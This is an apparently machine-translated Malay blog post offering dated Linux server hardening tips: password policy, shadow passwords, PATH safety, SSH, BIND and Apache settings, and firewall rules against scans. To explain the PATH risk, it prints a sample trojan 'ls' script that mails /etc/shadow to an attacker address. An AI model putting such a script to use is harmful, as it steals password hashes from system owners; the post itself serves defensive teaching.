Petua Keselamatan untuk Linux Anda (Pelayan) (Bahagian 1)

Saya telah lama tidak menerbitkan apa-apa di blog dan saya ingin berkongsi dengan anda beberapa petua yang diambil dari sebuah buku yang, (Antara lain). Saya menjumpainya di Universiti dan saya baru membaca dan walaupun secara jujur ​​agak ketinggalan zaman dan teknik yang ditunjukkan sangat tidak mungkin berfungsi memandangkan evolusi sistem, mereka juga aspek menarik yang dapat ditunjukkan. 9788448140502

Saya ingin menjelaskan bahawa ini adalah petua yang berorientasi pada sistem Linux yang digunakan sebagai pelayan, pada skala sederhana atau mungkin besar memandangkan pada tingkat pengguna desktop, walaupun dapat diterapkan, mereka tidak akan berguna.

Saya juga memberi amaran bahawa ini adalah petua ringkas yang mudah dan saya tidak akan membahas dengan lebih terperinci, walaupun saya merancang untuk membuat catatan lain yang lebih spesifik dan luas mengenai topik tertentu. Tetapi saya akan melihatnya kemudian. Mari kita mulakan.

Dasar kata laluan. 

Walaupun kedengarannya seperti kata kunci, mempunyai dasar kata laluan yang baik membuat perbezaan antara sistem yang rentan atau tidak. Serangan seperti "brute force" memanfaatkan kata laluan yang salah untuk mengakses sistem. Petua yang paling biasa adalah:

  • Gabungkan huruf besar dan huruf kecil.
  • Gunakan watak khas.
  • Nombor.
  • Lebih daripada 6 digit (mudah-mudahan lebih daripada 8).

Sebagai tambahan kepada ini, mari kita pertimbangkan dua fail penting.  / etc / passwd dan / etc / shadow.

Sesuatu yang sangat penting ialah fail itu / etc / passwd. Selain memberi kami nama pengguna, uidnya, folder folder, bash .. dll. dalam beberapa kes, ia juga menunjukkan kunci pengguna yang disulitkan.

 Mari lihat komposisi khasnya.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

pengguna: cryptkey: uid: gid: path :: path: bash

Masalah sebenarnya di sini, adalah bahawa fail tertentu ini mempunyai kebenaran -rw-r - r– yang bermaksud bahawa ia mempunyai izin membaca untuk mana-mana pengguna di sistem. dan mempunyai kunci yang disulitkan tidak terlalu sukar untuk menguraikan yang sebenarnya.

Itulah sebabnya fail itu wujud / etc / bayangan. Ini adalah fail di mana semua kunci pengguna disimpan, antara lain. Fail ini mempunyai kebenaran yang diperlukan sehingga tidak ada pengguna yang dapat membacanya.

Untuk memperbaikinya, kita mesti pergi ke fail / etc / passwd dan menukar kunci yang dienkripsi menjadi "x", ini akan menyebabkan kunci hanya disimpan dalam fail kami / etc / bayangan.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Masalah dengan PATH dan .bashrc dan lain-lain.

Apabila pengguna melaksanakan perintah di konsol mereka, shell mencari perintah itu dalam senarai direktori yang terdapat dalam pemboleh ubah persekitaran PATH.

Sekiranya anda menaip "echo $ PATH" di konsol, ia akan mengeluarkan sesuatu seperti ini.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Setiap folder ini adalah tempat shell akan mencari perintah yang ditulis untuk melaksanakannya. The "." ini bermaksud bahawa folder pertama yang dicari adalah folder yang sama dari mana perintah itu dijalankan.

Katakan ada pengguna "Carlos" dan pengguna ini mahu "melakukan kejahatan." Pengguna ini dapat meninggalkan fail yang disebut "ls" di folder utamanya, dan dalam fail ini menjalankan perintah seperti:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Dan jika pengguna root untuk tujuan, cuba menyenaraikan folder di dalam folder carlos (kerana pertama kali mencari perintah dalam folder yang sama, secara tidak sengaja ia akan menghantar fail dengan kata laluan ke e-mel ini dan kemudian foldernya akan disenaraikan dan dia tidak akan mengetahui sehingga terlambat.

Untuk mengelakkannya, kita mesti menghapuskan "". " pemboleh ubah PATH.

Dengan cara yang sama, fail seperti /.bashrc, /.bashrc_profile, ./.login harus diaudit dan pastikan tidak ada "." dalam pemboleh ubah PATH, dan sebenarnya dari fail seperti ini, anda boleh mengubah tujuan perintah tertentu.

Petua dengan perkhidmatan:

SHH

  • Lumpuhkan versi 1 protokol ssh dalam fail sshd_config.
  • Jangan biarkan pengguna root log masuk dengan ssh.
  • Fail dan folder ssh_host_key, ssh_host_dsa_key dan ssh_host_rsa_key hanya boleh dibaca oleh pengguna root.

BIND

  • Tukar mesej selamat datang di file bernama.conf sehingga tidak menunjukkan nombor versi
  • Hadkan pemindahan zon, dan hanya membolehkannya untuk pasukan yang memerlukannya.

Apache

  • Cegah perkhidmatan daripada menampilkan versi anda dalam mesej selamat datang. Edit fail httpd.conf dan tambahkan atau ubah baris:  

ServerSignature Off
ServerTokens Prod

  • Lumpuhkan pengindeksan automatik
  • Konfigurasikan apache agar tidak melayan fail sensitif seperti .htacces, * .inc, * .jsp .. dll
  • Keluarkan halaman lelaki atau sampel dari perkhidmatan
  • Jalankan apache dalam persekitaran chroot

Keselamatan rangkaian.

Adalah mustahak untuk menutup semua kemungkinan masuk ke sistem anda dari rangkaian luaran, berikut adalah beberapa petua penting untuk mengelakkan penceroboh mengimbas dan mendapatkan maklumat dari rangkaian anda.

Sekat lalu lintas ICMP

Firewall mesti dikonfigurasi untuk menyekat semua trafik ICMP yang masuk dan keluar dan respons gema. Dengan ini anda mengelakkan itu, misalnya, pengimbas yang mencari peralatan langsung dalam pelbagai IP menempatkan anda. 

Elakkan imbasan ping TCP.

Salah satu cara untuk mengimbas sistem anda ialah imbasan ping TCP. Katakan bahawa di pelayan anda terdapat pelayan Apache pada port 80. Penceroboh dapat mengirim permintaan ACK ke port tersebut. Dengan ini, jika sistem bertindak balas, komputer akan hidup dan akan mengimbas port-port yang lain.

Untuk ini, firewall anda harus selalu mempunyai pilihan "keadaan sedar" dan harus membuang semua paket ACK yang tidak sesuai dengan sambungan atau sesi TCP yang telah ditetapkan.

Beberapa petua tambahan:

  • Gunakan sistem IDS untuk mengesan imbasan port ke rangkaian anda.
  • Konfigurasikan Firewall agar tidak mempercayai tetapan port sumber sambungan.

Ini kerana beberapa imbasan menggunakan port sumber "palsu" seperti 20 atau 53, kerana banyak sistem mempercayai port ini kerana tipikalnya adalah ftp atau DNS.

NOTA: Ingatlah bahawa kebanyakan masalah yang ditunjukkan dalam catatan ini telah diselesaikan di hampir semua edaran semasa. Tetapi tidak ada salahnya untuk mendapatkan maklumat penting mengenai ketidakselesaan ini sehingga tidak berlaku kepada anda.

NOTA: Nanti saya akan melihat topik tertentu dan saya akan membuat catatan dengan maklumat yang lebih terperinci dan terkini.

Terima kasih semua orang kerana membaca.

Greetings.


Kandungan artikel mematuhi prinsip kami etika editorial. Untuk melaporkan ralat, klik di sini.

Komen, tinggalkan komen anda

Tinggalkan komen anda

Alamat email anda tidak akan disiarkan.

*

*

  1. Bertanggungjawab atas data: Miguel Ángel Gatón
  2. Tujuan data: Mengendalikan SPAM, pengurusan komen.
  3. Perundangan: Persetujuan anda
  4. Komunikasi data: Data tidak akan disampaikan kepada pihak ketiga kecuali dengan kewajiban hukum.
  5. Penyimpanan data: Pangkalan data yang dihoskan oleh Occentus Networks (EU)
  6. Hak: Pada bila-bila masa anda boleh menghadkan, memulihkan dan menghapus maklumat anda.

  1.   tidak bermaklumat kata

    Saya sangat menyukai artikel itu dan saya berminat dengan subjeknya, saya mendorong anda untuk terus memuat naik kandungan.